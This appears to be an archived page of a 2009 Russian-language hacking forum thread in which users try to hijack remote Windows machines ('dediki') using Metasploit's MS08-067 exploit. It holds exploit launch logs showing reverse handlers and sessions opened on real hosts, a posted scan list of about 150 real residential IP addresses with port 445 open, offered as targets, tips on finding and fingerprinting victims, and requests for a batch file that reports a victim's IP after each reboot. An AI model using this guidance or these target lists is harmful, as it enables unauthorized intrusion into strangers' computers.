PDA

Просмотр полной версии : Дедик или поможет нам Metasploit 3.2


Страницы : 1 2 [3]

fl00der
25.05.2009, 12:33
Кидаешь ему terminal.exe куда либо, и потом запускаешь из радмина, ну или через командную строку чтобы без палева.
============================
К сожалению, терминал.экзе уже многими палится и у него есть огромный минус: он ориентирован на русскую винду.

Kupnu4
25.05.2009, 15:01
Конечно немного не в тему, но разве нельзя терминал собрать для других версий винды. И вроде бы все что в key.reg можно через cmd забить ? А остальное может вручную ? Тогда может не будет палева ? Хотя нет, палево все таки будет, при замене файлов, там потребуется диск итд...

PiPPaK
25.05.2009, 17:14
Перебрал 24 деда с открытыми портами 445 и забил на етот способ. Ниодного удачного соединения((

fl00der
25.05.2009, 19:02
Конечно немного не в тему, но разве нельзя терминал собрать для других версий винды. И вроде бы все что в key.reg можно через cmd забить ? А остальное может вручную ? Тогда может не будет палева ? Хотя нет, палево все таки будет, при замене файлов, там потребуется диск итд...Все можно. Вот только надо для каждой версии собирать.
Собири мне например для арабской, китайской и индийской версий.

finall2
26.05.2009, 02:30
Все можно. Вот только надо для каждой версии собирать.
Собири мне например для арабской, китайской и индийской версий.
ага и на всех языках мира :D
там сменить пару строчек и ...

Kupnu4
29.05.2009, 13:08
В общем я посканил, и обнаружил что у меня фильтруются порты :( Хз что теперь делать.

Fallen_Inc
04.06.2009, 03:52
Народ есть проблема: в реадмине не роботает виев мод, и фул контрол (заканчивается все на иницыализацыи екрана и тишна), только файл трансфер пашет. В чем может быть проблема?

Jim_Di
04.06.2009, 08:55
Скорей всего канал забит, у меня на домашней машине при активной закачке торрентов такая ботва

Fallen_Inc
04.06.2009, 13:11
Вопрос снят. проблема неизвесна, но все исправитлось за ночь.)

liquidcube
08.06.2009, 23:29
offtop:
Я вот заметил, что все сидят на win,я на лине(fedora10),и вот как мне запустить этот metasploit?
Для него требуется Ruby(уже собрал,работает).
Сканер тоже работает(проверено).
Как через Ruby запустить metasploit?
С Ruby сталкиваюсь первый раз, извиняйте.

dyExplode
11.06.2009, 01:30
offtop:
Я вот заметил, что все сидят на win,я на лине(fedora10),и вот как мне запустить этот metasploit?
Для него требуется Ruby(уже собрал,работает).
Сканер тоже работает(проверено).
Как через Ruby запустить metasploit?
С Ruby сталкиваюсь первый раз, извиняйте.
качаеш версию под линь распаковываеш и запускаеш
./msfgui
(для справки ruby это интерпритируемый язык как например python.)

dyExplode
11.06.2009, 01:35
чтоб всё работало нужны пакеты:
ruby
ruby-irb
ruby-libs
ruby-rdoc
ruby-devel
readline
rubygems

GenaD
13.06.2009, 19:50
18:45:55 - ms08_067_netapi Launching exploit windows/smb/ms08_067_netapi...
18:45:56 - ms08_067_netapi Started reverse handler
18:45:56 - ms08_067_netapi Automatically detecting the target...
18:46:06 - ms08_067_netapi Fingerprint: Windows XP Service Pack 2 - lang:Russian
18:46:06 - ms08_067_netapi Selected Target: Windows XP SP2 Russian (NX)
18:46:07 - ms08_067_netapi Triggering the vulnerability...
18:46:07 - Session 3 created for **.**.192.111:4467
А выпадения консольки нету =((( сесия есть а консоли нет =(((

284 компа
с них 90% "Triggering the vulnerability..."
9% Експлоит не подошол
1% "Session 1 created for..."
Ниодной консоли...
З.Ы. Что делать не знаю... сижу из под DSL интернета!Успеха 0...

POS_troi
14.06.2009, 16:25
Как настроен модем? Бриджем или Роутером?

Кликни два раза на сессию - должно открыться окно консоли.

Bramin
18.06.2009, 19:14
Проблема, подскажите.
Скачал с сайта www.metasploit.com файл Metasploit3.2 для винды. Установил его. Папки GUI там вообще нет, нашел файл ms08-067_netapi он вообще в другой папке. Скачал интерпретатор Ruby. Пытюсь запустить сплоит в cmd выдает ошибку: ms08_067_netapi.rb:13:in `require': no such file to load -- msf/core (LoadError)
from ms08_067_netapi.rb:13
Кто знает в чем дело? бьюсь уже весь день.

POS_troi
19.06.2009, 10:53
В меню пуск ярлыки появились?

Bramin
19.06.2009, 18:22
Да ярлыки есть, но когда запускаю любой из них выскакивает окно доса и тут же закрывается. У меня Vista, может в этом проблема?

POS_troi
19.06.2009, 18:31
Доволи распространенная бага даже уже можно сказать фича.

Как вариант отключи Антивирус и переустонови потом сразу добавь каталог в списки разрешенніх - чтобі антивирус не трогал + запускай от Админа

dyExplode
21.06.2009, 14:25
Да ярлыки есть, но когда запускаю любой из них выскакивает окно доса и тут же закрывается. У меня Vista, может в этом проблема?
одно только выражение "окно доса" говорит о знаниях, способностях и месте локализации рук.

Olegros911
21.06.2009, 15:36
вы вродиб и не слышали о запуске из под доса.....
сначала запускаем командною строку....а уже из под ее запускаем само приложение

dyExplode
21.06.2009, 19:04
командная строка это не ДОС и доса в NT системах не может быть по определению

Misha-_-rus
27.06.2009, 08:23
Народ, у меня перестал работать metaslpoit через Gui интерфейс, выходит ошибка: Точка входа в процедуру XML_SetDoctypeDeclHander не найдена в библиотеке DLL xmlparse.dll. Как решить данную проблему?
Может кто-нибудь выложить работующий dll.

!TNK!
27.06.2009, 08:55
вот попробуй ddl (http://kfvbyfn.ucoz.ru/load/0-0-0-8-20)

Misha-_-rus
27.06.2009, 11:49
нет не помогло, также выходит ошибка.
Кидал в framework3\gtk\bin\

morris
29.06.2009, 12:02
нужно кидать в system32

lemyrr
01.07.2009, 14:34
Установил версию 3.2 на XP хом, не запускается ни как, окошко с командной строкой появляться на мгновение и зразу исчезает, таг же не работает веб интерфейс. Как запустить то?

Велемир
20.07.2009, 21:33
командная строка это не ДОС и доса в NT системах не может быть по определению

Командная строка есь интерфейс командной оболочки.Откуда ты определения-то толкаешь ? NT выросло из MS-DOS.Хотя бы наличие файлов autoexec.bat и kernel.sys ни о чем не грит ?

echobyte
20.07.2009, 23:20
Установил версию 3.2 на XP хом, не запускается ни как, окошко с командной строкой появляться на мгновение и зразу исчезает, таг же не работает веб интерфейс. Как запустить то?
Сначала нучись запускать командную строку.

Jamsho0T
21.07.2009, 04:01
92.124.160.171 165 ms host-92-124-160-171.pppoe.omsknet.ru 445
92.124.160.179 358 ms host-92-124-160-179.pppoe.omsknet.ru 445
92.124.161.104 178 ms host-92-124-161-104.pppoe.omsknet.ru 445
92.124.161.199 176 ms host-92-124-161-199.pppoe.omsknet.ru 445
92.124.161.240 165 ms host-92-124-161-240.pppoe.omsknet.ru 445
92.124.162.103 156 ms host-92-124-162-103.pppoe.omsknet.ru 445
92.124.162.122 130 ms host-92-124-162-122.pppoe.omsknet.ru 445
92.124.162.135 169 ms host-92-124-162-135.pppoe.omsknet.ru 445
92.124.162.151 155 ms host-92-124-162-151.pppoe.omsknet.ru 445
92.124.162.168 154 ms host-92-124-162-168.pppoe.omsknet.ru 445
92.124.162.222 242 ms host-92-124-162-222.pppoe.omsknet.ru 445
92.124.163.10 179 ms host-92-124-163-10.pppoe.omsknet.ru 445
92.124.163.78 157 ms host-92-124-163-78.pppoe.omsknet.ru 445
92.124.163.113 158 ms host-92-124-163-113.pppoe.omsknet.ru 445
92.124.163.121 158 ms host-92-124-163-121.pppoe.omsknet.ru 445
92.124.163.205 164 ms host-92-124-163-205.pppoe.omsknet.ru 445
92.124.163.227 204 ms host-92-124-163-227.pppoe.omsknet.ru 445
92.124.163.228 158 ms host-92-124-163-228.pppoe.omsknet.ru 445
92.124.164.31 156 ms host-92-124-164-31.pppoe.omsknet.ru 445
92.124.164.85 159 ms host-92-124-164-85.pppoe.omsknet.ru 445
92.124.164.87 173 ms host-92-124-164-87.pppoe.omsknet.ru 445
92.124.164.180 168 ms host-92-124-164-180.pppoe.omsknet.ru 445
92.124.164.225 168 ms host-92-124-164-225.pppoe.omsknet.ru 445
92.124.165.9 154 ms host-92-124-165-9.pppoe.omsknet.ru 445
92.124.165.107 465 ms host-92-124-165-107.pppoe.omsknet.ru 445
92.124.165.191 156 ms host-92-124-165-191.pppoe.omsknet.ru 445
92.124.165.205 167 ms host-92-124-165-205.pppoe.omsknet.ru 445
92.124.165.228 256 ms host-92-124-165-228.pppoe.omsknet.ru 445
92.124.166.126 172 ms host-92-124-166-126.pppoe.omsknet.ru 445
92.124.166.143 167 ms host-92-124-166-143.pppoe.omsknet.ru 445
92.124.166.154 200 ms host-92-124-166-154.pppoe.omsknet.ru 445
92.124.166.220 181 ms host-92-124-166-220.pppoe.omsknet.ru 445
92.124.167.122 169 ms host-92-124-167-122.pppoe.omsknet.ru 445
92.124.167.124 174 ms host-92-124-167-124.pppoe.omsknet.ru 445
92.124.167.167 158 ms host-92-124-167-167.pppoe.omsknet.ru 445
92.124.167.195 160 ms host-92-124-167-195.pppoe.omsknet.ru 445
92.124.168.36 156 ms host-92-124-168-36.pppoe.omsknet.ru 445
92.124.168.62 182 ms host-92-124-168-62.pppoe.omsknet.ru 445
92.124.168.110 166 ms host-92-124-168-110.pppoe.omsknet.ru 445
92.124.169.71 396 ms host-92-124-169-71.pppoe.omsknet.ru 445
92.124.169.96 159 ms host-92-124-169-96.pppoe.omsknet.ru 445
92.124.169.165 209 ms host-92-124-169-165.pppoe.omsknet.ru 445
92.124.170.104 318 ms host-92-124-170-104.pppoe.omsknet.ru 445
92.124.170.144 163 ms host-92-124-170-144.pppoe.omsknet.ru 445
92.124.170.207 167 ms host-92-124-170-207.pppoe.omsknet.ru 445
92.124.170.213 279 ms host-92-124-170-213.pppoe.omsknet.ru 445
92.124.171.22 158 ms host-92-124-171-22.pppoe.omsknet.ru 445
92.124.171.49 166 ms host-92-124-171-49.pppoe.omsknet.ru 445
92.124.171.56 149 ms host-92-124-171-56.pppoe.omsknet.ru 445
92.124.171.68 166 ms host-92-124-171-68.pppoe.omsknet.ru 445
92.124.171.127 158 ms host-92-124-171-127.pppoe.omsknet.ru 445
92.124.171.134 635 ms host-92-124-171-134.pppoe.omsknet.ru 445
92.124.171.179 158 ms host-92-124-171-179.pppoe.omsknet.ru 445
92.124.172.219 156 ms host-92-124-172-219.pppoe.omsknet.ru 445
92.124.173.67 148 ms host-92-124-173-67.pppoe.omsknet.ru 445
92.124.173.144 164 ms host-92-124-173-144.pppoe.omsknet.ru 445
92.124.173.157 157 ms host-92-124-173-157.pppoe.omsknet.ru 445
92.124.173.179 150 ms host-92-124-173-179.pppoe.omsknet.ru 445
92.124.173.193 168 ms host-92-124-173-193.pppoe.omsknet.ru 445
92.124.173.205 225 ms host-92-124-173-205.pppoe.omsknet.ru 445
92.124.173.241 171 ms host-92-124-173-241.pppoe.omsknet.ru 445
92.124.174.76 159 ms host-92-124-174-76.pppoe.omsknet.ru 445
92.124.174.111 143 ms host-92-124-174-111.pppoe.omsknet.ru 445
92.124.174.191 163 ms host-92-124-174-191.pppoe.omsknet.ru 445
92.124.175.45 171 ms host-92-124-175-45.pppoe.omsknet.ru 445
92.124.175.141 157 ms host-92-124-175-141.pppoe.omsknet.ru 445
92.124.175.195 162 ms host-92-124-175-195.pppoe.omsknet.ru 445
92.124.176.60 170 ms host-92-124-176-60.pppoe.omsknet.ru 445
92.124.176.65 170 ms host-92-124-176-65.pppoe.omsknet.ru 445
92.124.176.99 571 ms host-92-124-176-99.pppoe.omsknet.ru 445
92.124.176.145 139 ms host-92-124-176-145.pppoe.omsknet.ru 445
92.124.176.170 158 ms host-92-124-176-170.pppoe.omsknet.ru 445
92.124.177.3 193 ms host-92-124-177-3.pppoe.omsknet.ru 445
92.124.177.23 161 ms host-92-124-177-23.pppoe.omsknet.ru 445
92.124.177.45 481 ms host-92-124-177-45.pppoe.omsknet.ru 445
92.124.177.73 167 ms host-92-124-177-73.pppoe.omsknet.ru 445
92.124.177.153 1183 ms host-92-124-177-153.pppoe.omsknet.ru 445
92.124.177.211 177 ms host-92-124-177-211.pppoe.omsknet.ru 445
92.124.178.9 190 ms host-92-124-178-9.pppoe.omsknet.ru 445
92.124.178.35 152 ms host-92-124-178-35.pppoe.omsknet.ru 445
92.124.178.99 165 ms host-92-124-178-99.pppoe.omsknet.ru 445
92.124.178.146 187 ms host-92-124-178-146.pppoe.omsknet.ru 445
92.124.178.161 170 ms host-92-124-178-161.pppoe.omsknet.ru 445
92.124.178.171 524 ms host-92-124-178-171.pppoe.omsknet.ru 445
92.124.178.210 156 ms host-92-124-178-210.pppoe.omsknet.ru 445
92.124.178.254 161 ms host-92-124-178-254.pppoe.omsknet.ru 445
92.124.179.22 488 ms host-92-124-179-22.pppoe.omsknet.ru 445
92.124.179.96 172 ms host-92-124-179-96.pppoe.omsknet.ru 445
92.124.179.99 167 ms host-92-124-179-99.pppoe.omsknet.ru 445
92.124.179.104 164 ms host-92-124-179-104.pppoe.omsknet.ru 445
92.124.179.110 166 ms host-92-124-179-110.pppoe.omsknet.ru 445
92.124.179.119 155 ms host-92-124-179-119.pppoe.omsknet.ru 445
92.124.179.210 164 ms host-92-124-179-210.pppoe.omsknet.ru 445
92.124.179.230 172 ms host-92-124-179-230.pppoe.omsknet.ru 445
92.124.179.250 157 ms host-92-124-179-250.pppoe.omsknet.ru 445
92.124.180.58 164 ms host-92-124-180-58.pppoe.omsknet.ru 445
92.124.180.61 168 ms host-92-124-180-61.pppoe.omsknet.ru 445
92.124.180.79 163 ms host-92-124-180-79.pppoe.omsknet.ru 445
92.124.180.110 176 ms host-92-124-180-110.pppoe.omsknet.ru 445
92.124.180.243 1537 ms host-92-124-180-243.pppoe.omsknet.ru 445
92.124.181.6 182 ms host-92-124-181-6.pppoe.omsknet.ru 445
92.124.181.37 173 ms host-92-124-181-37.pppoe.omsknet.ru 445
92.124.181.56 158 ms host-92-124-181-56.pppoe.omsknet.ru 445
92.124.181.142 328 ms host-92-124-181-142.pppoe.omsknet.ru 445
92.124.181.160 164 ms host-92-124-181-160.pppoe.omsknet.ru 445
92.124.181.223 160 ms host-92-124-181-223.pppoe.omsknet.ru 445
92.124.181.254 172 ms host-92-124-181-254.pppoe.omsknet.ru 445
92.124.182.58 169 ms host-92-124-182-58.pppoe.omsknet.ru 445
92.124.182.174 165 ms host-92-124-182-174.pppoe.omsknet.ru 445
92.124.182.217 161 ms host-92-124-182-217.pppoe.omsknet.ru 445
92.124.182.250 155 ms host-92-124-182-250.pppoe.omsknet.ru 445
92.124.183.45 172 ms host-92-124-183-45.pppoe.omsknet.ru 445
92.124.183.60 160 ms host-92-124-183-60.pppoe.omsknet.ru 445
92.124.183.239 552 ms host-92-124-183-239.pppoe.omsknet.ru 445
92.124.184.144 167 ms host-92-124-184-144.pppoe.omsknet.ru 445
92.124.184.152 153 ms host-92-124-184-152.pppoe.omsknet.ru 445
92.124.184.164 234 ms host-92-124-184-164.pppoe.omsknet.ru 445
92.124.184.216 158 ms host-92-124-184-216.pppoe.omsknet.ru 445
92.124.184.230 160 ms host-92-124-184-230.pppoe.omsknet.ru 445
92.124.185.117 174 ms host-92-124-185-117.pppoe.omsknet.ru 445
92.124.186.8 247 ms host-92-124-186-8.pppoe.omsknet.ru 445
92.124.186.46 220 ms host-92-124-186-46.pppoe.omsknet.ru 445
92.124.186.99 168 ms host-92-124-186-99.pppoe.omsknet.ru 445
92.124.186.187 154 ms host-92-124-186-187.pppoe.omsknet.ru 445
92.124.186.198 259 ms host-92-124-186-198.pppoe.omsknet.ru 445
92.124.187.35 155 ms host-92-124-187-35.pppoe.omsknet.ru 445
92.124.187.74 185 ms host-92-124-187-74.pppoe.omsknet.ru 445
92.124.187.79 185 ms host-92-124-187-79.pppoe.omsknet.ru 445
92.124.187.188 168 ms host-92-124-187-188.pppoe.omsknet.ru 445
92.124.187.208 171 ms host-92-124-187-208.pppoe.omsknet.ru 445
92.124.187.216 200 ms host-92-124-187-216.pppoe.omsknet.ru 445
92.124.188.94 180 ms host-92-124-188-94.pppoe.omsknet.ru 445
92.124.189.9 148 ms host-92-124-189-9.pppoe.omsknet.ru 445
92.124.189.50 231 ms host-92-124-189-50.pppoe.omsknet.ru 445
92.124.189.116 164 ms host-92-124-189-116.pppoe.omsknet.ru 445
92.124.190.43 174 ms host-92-124-190-43.pppoe.omsknet.ru 445
92.124.190.51 797 ms host-92-124-190-51.pppoe.omsknet.ru 445
92.124.190.62 162 ms host-92-124-190-62.pppoe.omsknet.ru 445
92.124.190.66 159 ms host-92-124-190-66.pppoe.omsknet.ru 445
92.124.190.130 169 ms host-92-124-190-130.pppoe.omsknet.ru 445
92.124.190.180 154 ms host-92-124-190-180.pppoe.omsknet.ru 445
92.124.191.48 131 ms host-92-124-191-48.pppoe.omsknet.ru 445
92.124.191.79 155 ms host-92-124-191-79.pppoe.omsknet.ru 445
92.124.191.89 189 ms host-92-124-191-89.pppoe.omsknet.ru 445
92.124.191.155 157 ms host-92-124-191-155.pppoe.omsknet.ru 445
92.124.191.163 155 ms host-92-124-191-163.pppoe.omsknet.ru 445

Может кому пригодится , полность просканил на 445 порт - 92.124.160.0 - 92.124.191.255

delasoul
26.07.2009, 18:02
poskanil tisichu raz raznimi skanerami raznije diapazoni nigde netu portow 445!!!!
sredi setim wopros kak atkrit 445 port znaja toka ip na udaljonom kompe? bila be super

da i jesli mojno skajite kakije kamandi pisat w batnike chtobe pri atkrite srazu atprawil mne ip juzwera i pri kajdoj polucheni ili poluchenju nowowa ipa ili posle perezagruski atprawil mne ip na emailu ili na ftp

PS: jest kakojnibut drugoj sposob poluchit dedka? jesli jest to kakije mojete pisat zdes ili w lichku spasiba wsem za wnimanje

stopxaker
26.07.2009, 22:44
poskanil tisichu raz raznimi skanerami raznije diapazoni nigde netu portow 445!!!!
sredi setim wopros kak atkrit 445 port znaja toka ip na udaljonom kompe? bila be super

da i jesli mojno skajite kakije kamandi pisat w batnike chtobe pri atkrite srazu atprawil mne ip juzwera i pri kajdoj polucheni ili poluchenju nowowa ipa ili posle perezagruski atprawil mne ip na emailu ili na ftp

PS: jest kakojnibut drugoj sposob poluchit dedka? jesli jest to kakije mojete pisat zdes ili w lichku spasiba wsem za wnimanje


А можно по русски ? 2 delasoul без обид , но у себя я тебе влепил бан на два дня , ну не возможно читать ваш этот грёбанный транслит !!

InFlame
27.07.2009, 17:01
А как-нибудь можно процесс поиска уязвимых машин автоматизировать? А то перебирать десятки, а то и сотни компов вручную мягко говоря утомительно. =\

Xcontrol212
27.07.2009, 18:46
есть сканеры под определенные сплоиты есть сканеры+)
я юзал сканеры и под ,багу lsass..
http://www.securitylab.ru/ тут смотри,вроде есть=)

delasoul
27.07.2009, 23:50
А можно по русски ? 2 delasoul без обид , но у себя я тебе влепил бан на два дня , ну не возможно читать ваш этот грёбанный транслит !!
mesta bana mog be poleznim delom zanimatca i atwetit na maji woprosi.. jesli najdotca parjadechnij chelawek budu rad chitat atweti na maji woprosi spasiba stopxakr magu wapsche udalitca iz twajewo sajta kak ja wiju wi ploxo prinimajte gastej 1 den u was i ban nexarascho ja uje neskolko let tut i ni adnawo bana wopschem nexarascho....

lEh
28.07.2009, 00:23
mesta bana mog be poleznim delom zanimatca i atwetit na maji woprosi.. jesli najdotca parjadechnij chelawek budu rad chitat atweti na maji woprosi spasiba stopxakr magu wapsche udalitca iz twajewo sajta kak ja wiju wi ploxo prinimajte gastej 1 den u was i ban nexarascho ja uje neskolko let tut i ni adnawo bana wopschem nexarascho....


Da ladno zna4it za delo za banili, pri4em ne navsegda a na 2 sutok!!! A na SX vsegda pomogut!!! Tak 4to ne stoit panikovat` dobro pogalovat` po iste4eniy bana!!!

PS da i voobshe ne stoit obsugdat` tut ban na drugom forume!

delasoul
28.07.2009, 02:23
za kakoje dela zabanili? i zamet ne ja nachil tut rasujdat ... ladno ktonibut atwetit? srochno nujna dlja adnawo dela

M@ZAX@KEP
29.07.2009, 14:07
У вас чё, русской клавы нету?! Купите!! 200 рублей стоит :-)

А вот собсно, мой вопрос: какие диапазоны ip адресов нужно сканить, как определить по ip где расположен сервер, есть ли гденибудь списки диапазонов сортированные по расположению? (типа с такого-то по такой-то ип - это в такой стране, а с такого-то по такой-то это в другой=))... есть ведь что то такое... как регион на автомобильных номерах))... у ипов тоже какая-то цифра должна что-то обозначать

ЗЫ сорри если вопрос совсем уж дебильный... =)

Dis@
29.07.2009, 18:05
У вас чё, русской клавы нету?! Купите!! 200 рублей стоит :-)

А вот собсно, мой вопрос: какие диапазоны ip адресов нужно сканить, как определить по ip где расположен сервер, есть ли гденибудь списки диапазонов сортированные по расположению? (типа с такого-то по такой-то ип - это в такой стране, а с такого-то по такой-то это в другой=))... есть ведь что то такое... как регион на автомобильных номерах))... у ипов тоже какая-то цифра должна что-то обозначать

ЗЫ сорри если вопрос совсем уж дебильный... =)

Не вопрос дебильный, а вопрос ленивого человека, насамом деле все просто:- http://www.google.ru/ :p



вот база диапазонов http://worldips.info/
вот тут http://speed-tester.info/ip_location.php расположение IP, расстояние между IP и многое другое


Пользуйся на здоровье!

M@ZAX@KEP
29.07.2009, 19:18
2 Dis@ спасибо, + те))
ЗЫ Не искал в гугле просто патамушта не знал что искать и есть ли то что я исчу (разделение по странам) :D

nub-hacker
29.07.2009, 23:23
У меня после обнавления метасплоита всё получилось!!! ура!! круто

M@ZAX@KEP
30.07.2009, 12:07
У меня после обнавления метасплоита всё получилось!!!

А у меня не то что после обновления... у меня Метасплоит вообще не запускаццо! :( хз пачиму. Ни веб - интерфейс, ни GUI!

IWantBeautifulLife
30.07.2009, 12:43
Установи виртуалку и попробуй на других ОС

M@ZAX@KEP
30.07.2009, 14:07
Пробовал уже пат виртуалгой... никанает... у GUI версии пышет типа:
http://2d-portal.ucoz.ru/1.bmp
а у web версии выскакиват окно ком-сроки на какуюта сотую секунды и пропадает.. потом что-то грузицца пару секунд (часеги песочные рядом с указателем мыши и характерный хруст винчестеров испаццтала :D ) и всё.. тишина..... :confused:

Kornero
31.07.2009, 21:05
у меня такая же фигня была. Удали или переименнуй этот файл. он в виндовс\систем32 кажется лежит. У меня ещё потом на второй файл ругался, лекарство тоже самое=)

M@ZAX@KEP
31.07.2009, 21:08
2 Kornero: Не рискнул удалять файлы из системной директории со своего компа... попробовал... нет, не у соседа :D ... под виртуалкой. Переустановил и всё работает без сучка, без задоринки! Спасибо! ;)

toby1980
31.07.2009, 21:34
дедики надо брутить - ВОТ выход

Kornero
01.08.2009, 00:01
Ну да, у меня вообще так многие ошибки лечатся))) Сборка винды криво урезана) Попробуй переименуй. Если что всегда вернуть назад сможешь.

struk666
01.08.2009, 07:38
а нафик они вообще нужны? ну залил шелл и что? смысл то какой? почему допустим нельзя запустить брут чего-либо с домашнего компа через анонимный вип прокси?

stopxaker
01.08.2009, 07:43
а нафик они вообще нужны? ну залил шелл и что? смысл то какой?

Shell заливают на взломанный сайт , а в этом методе его получают , чуешь разницу ?

toby1980
01.08.2009, 08:05
а нафик они вообще нужны? ну залил шелл и что? смысл то какой? почему допустим нельзя запустить брут чего-либо с домашнего компа через анонимный вип прокси?
Прочитай статью с самого начала ... умнег... и не путай **й с пальцем...

struk666
01.08.2009, 08:30
да я прочитал
я просто спросил чтоб в кратце сказали почему необходим....там статья то маленькая...
спасибо за умника...)) люблю комплименты хых

M@ZAX@KEP
02.08.2009, 17:06
Есть 2 вопроса:
1)как узнать что тачка с открытым 445 портом - дедик, а не комп Васи Пупкина, который щас пайдёт спать и выключит его? Или 445 порт открыт ТОЛЬКО у дедиков?
2)если метасплойт при подключении к деду виснет и вылетает - это глюки у меня с метасплойтом или это на дедике уязвимости нету?

Dis@
05.08.2009, 10:21
Есть 2 вопроса:
1)как узнать что тачка с открытым 445 портом - дедик, а не комп Васи Пупкина, который щас пайдёт спать и выключит его? Или 445 порт открыт ТОЛЬКО у дедиков?

Ну вообще об этом говорит сама операционка ))) т.к. на базе хрюши нормальный серв - это фантастика, хотя встречаються уникумы которые умудряються и на нем построить серв, так что хр даже если и стоит у кого то, то скорее всего переодически будет вырубаться.

Так же ориентиром является софт установленный на тачке. Т.Е. если на тачке залит апач, веб сервер, почтовый сервер, игровой(такие обычно не долго живут), фтп - то это серв....
Но опять таки, может это просто какой-нибудь пацан или девченка, что реже как правило, у себя на домашней машине стартанули. Естественно расположение по ip, почитай инфу по адресу нахождения, если эт ДЦ - то радуйся, если часный адрес - смотри есть ли там какие нибыдь конторки и т.д. Думаю тут все просто и ты сам легко разберешся ))

M@ZAX@KEP
05.08.2009, 11:37
Спасибо! Будем смотреть, проверять и пробовать))

m03G
19.08.2009, 16:30
че за хрень такая почему не катит ?
пробовал разные тачки вот лог:
16:24:48 - Initialized the Metasploit Framework GUI.
16:25:36 - ms08_067_netapi Launching exploit windows/smb/ms08_067_netapi...
16:25:38 - ms08_067_netapi Started reverse handler
16:25:39 - ms08_067_netapi [-] Exploit failed: Login Failed: ????????? ???? ????????????? ???????? ???????????? ???????????.
16:25:48 - Stopping exploit:
16:26:49 - ms08_067_netapi Launching exploit windows/smb/ms08_067_netapi...
16:26:51 - ms08_067_netapi Started reverse handler
16:26:52 - ms08_067_netapi [-] Exploit failed: Login Failed: ????????? ???? ????????????? ???????? ???????????? ???????????.
16:31:14 - ms08_067_netapi Launching exploit windows/smb/ms08_067_netapi...
16:31:15 - ms08_067_netapi Started reverse handler
16:31:20 - ms08_067_netapi Automatically detecting the target...
16:31:58 - ms08_067_netapi Fingerprint: Windows XP Service Pack 3 - lang:Russian
16:31:58 - ms08_067_netapi Selected Target: Windows XP SP3 Russian (NX)
16:32:02 - ms08_067_netapi Triggering the vulnerability...
16:32:04 - ms08_067_netapi [-] Exploit failed: ????????? ???? ????????????? ???????? ???????????? ???????????.
16:42:27 - ms08_067_netapi Launching exploit windows/smb/ms08_067_netapi...
16:42:28 - ms08_067_netapi Started reverse handler
16:42:35 - ms08_067_netapi Automatically detecting the target...
16:42:36 - ms08_067_netapi Fingerprint: Windows 2003 R2 Service Pack 2 - lang:Unknown
16:42:36 - ms08_067_netapi Could not determine the exact language pack
16:43:47 - ms08_067_netapi Launching exploit windows/smb/ms08_067_netapi...
16:43:48 - ms08_067_netapi Started reverse handler
16:43:52 - ms08_067_netapi Automatically detecting the target...
16:44:02 - ms08_067_netapi Fingerprint: Windows 2003 R2 Service Pack 2 - lang:Unknown
16:44:02 - ms08_067_netapi Could not determine the exact language pack
16:46:47 - ms08_067_netapi Launching exploit windows/smb/ms08_067_netapi...
16:46:49 - ms08_067_netapi Started reverse handler
16:47:07 - ms08_067_netapi Triggering the vulnerability...
16:49:32 - ms08_067_netapi Launching exploit windows/smb/ms08_067_netapi...
16:49:34 - ms08_067_netapi Started reverse handler
16:49:37 - ms08_067_netapi Automatically detecting the target...
16:49:55 - ms08_067_netapi Fingerprint: Windows XP Service Pack 3 - lang:Russian
16:49:55 - ms08_067_netapi Selected Target: Windows XP SP3 Russian (NX)
16:49:58 - ms08_067_netapi Triggering the vulnerability..

еще LHOST 10.237.173.176 у меня всегда 1 и тот же татак и должно быть ?

InFlame
19.08.2009, 17:26
Проверь вот этим уязвима машина или нет
http://www.ptsecurity.ru/download/pt-check-09-001-ru.zip

m03G
19.08.2009, 18:31
2 InFlame
спс за прогу значит я такой счасливый тачки не подвержены этой уязвимости

MERRON
04.09.2009, 22:21
Я тут подумал. А нельзя ли кидать шелл на компы из хамачи-сети? если можно то как?

five5feer
04.09.2009, 22:59
Я тут подумал. А нельзя ли кидать шелл на компы из хамачи-сети? если можно то как?

нельзя

ferre_L
07.09.2009, 02:32
мне б в пм диапазончик рабочий, ато перепробывал уже штук й00(уса, россия, украина, британия франция ниндерланды), не одного 445 порта, просто хочу удостоверится что проблема на моей стороне

MERRON
07.09.2009, 20:43
нельзя

хе...у меня получилось через хамачи залезть))

HakaR
10.09.2009, 12:13
Если в ip-scan порт 445 открыт, но XSpider пишет что 445 порт неуязвим, то ничего не получится? чё то я запутался... :(

RazdoR
17.09.2009, 17:07
Если 445 порт открыт, проделываю все как написано, но в поле sessions ничего не появляется - это что значит? какие еще настройки туда внести, где вписывается ip дедика, в smbpipe и в прочие

stopxaker
17.09.2009, 17:11
Если 445 порт открыт, проделываю все как написано, но в поле sessions ничего не появляется - это что значит? какие еще настройки туда внести, где вписывается ip дедика, в smbpipe и в прочие

Мужики не чудите , статья написана 05.01.2009 без малого год , уязвимость эта уже не актуальна , если что то и можно с неё поиметь то только в локалке и то где стоит XP sp2 без заплатки !

prostopovelitel
17.09.2009, 18:16
статья статья... самое главное думай об облаках и говори - я отказываюсь давать показания

Kupnu4
17.09.2009, 21:29
Хм...уязвимость есть, а сплойт так и пишет Triggering the vulnerability...

http://s05.radikal.ru/i178/0909/68/10135a92ed71t.jpg (http://radikal.ru/F/s05.radikal.ru/i178/0909/68/10135a92ed71.jpg.html)

Bpeguha
22.09.2009, 01:09
Подскажите если не трудно, не открывается Metasploit 3 GUI , выдает такую ошибку http://i044.radikal.ru/0909/eb/d16bb1a4e99f.jpg
С Метасплоит 3 Веб никаких проблем нету,но мне нужна именно GUI

Bpeguha
22.09.2009, 14:11
и почему пишется

Started reverse handler
Automatically detecting the target...
Fingerprint: Windows XP Service Pack 2 - lang:English
Selected Target: Windows XP SP2 English (NX)
Triggering the vulnerability...
Exploit completed, but no session was created.

The_KOPACb
30.09.2009, 18:23
Подскажите если не трудно, не открывается Metasploit 3 GUI , выдает такую ошибку http://i044.radikal.ru/0909/eb/d16bb1a4e99f.jpg
С Метасплоит 3 Веб никаких проблем нету,но мне нужна именно GUIреинсталл сделай, тока удали руками то что он говорит не удаляет..


мммм, возникла небольшая проблема:

в общем суть такова: есть в локалке одна тачка которую надо ломануть, сплойт срабатывает, метасплойт показывает что есть шелл, но сразу же после открытия шелла прерывает сессию.. в чем может быть проблема?


18:39:07 - ms08_067_netapi Launching exploit windows/smb/ms08_067_netapi...
18:39:08 - ms08_067_netapi Started reverse handler
18:39:08 - ms08_067_netapi Automatically detecting the target...
18:39:09 - ms08_067_netapi Fingerprint: Windows XP Service Pack 3 - lang:Russian
18:39:09 - ms08_067_netapi Selected Target: Windows XP SP3 Russian (NX)
18:39:09 - ms08_067_netapi Triggering the vulnerability...
